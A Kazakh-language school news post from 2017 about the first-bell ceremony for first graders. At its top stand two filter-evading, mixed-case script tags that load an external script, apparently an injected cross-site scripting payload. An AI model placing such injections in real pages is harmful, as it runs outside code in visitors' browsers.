<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

05.09.2017

Алғашқы қоңырау

Жарқын жазда  зымырап өте шықты. Біз жаңа оқу жылын сабырсыздана  асыға  күтеміз. Бұл жыл біреуге мектеп табалдырығын алғаш аттаған кез болса, ал біреулерге білім алған алтын ұя мектебімен қоштасатын қимастық кез. Білім күні жаз бойына демалып, күнге күйген барлық балалар  мектеп ауласына жиналды.   Олар сыныптас балаларымен, сынып жетекшілерімен, сүйікті ұстаздарымен қуана қауышты. Әдемі киініп, қолдарына гүл шоқтарын ұстаған біздің мектептің ең кішкентай оқушылары тұр. Бірінші сынып оқушылары сәл қобалжып тұрғандай.  Бүгін алғашқы қоңырау үнімен, бірінші сынып оқушыларына мектеп атты үлкен жол ашылады. Ол өмірге ұзақ он бір жыл бойына  апарады. Бұл жол сендерге бақыт әкелетін жол болсын.  Үлкен  білім жүгін  меңгеріп, өздеріңе жақсы достар табуға тілектеспін. Мерекелеріңмен,біздің жарқын болашақтарымыз!  

                                                

1 сынып  жетекшісі  С.Щербакова

 

Просмотров: 894


Пікір қосу



Деректерді қолтаңбаға қосу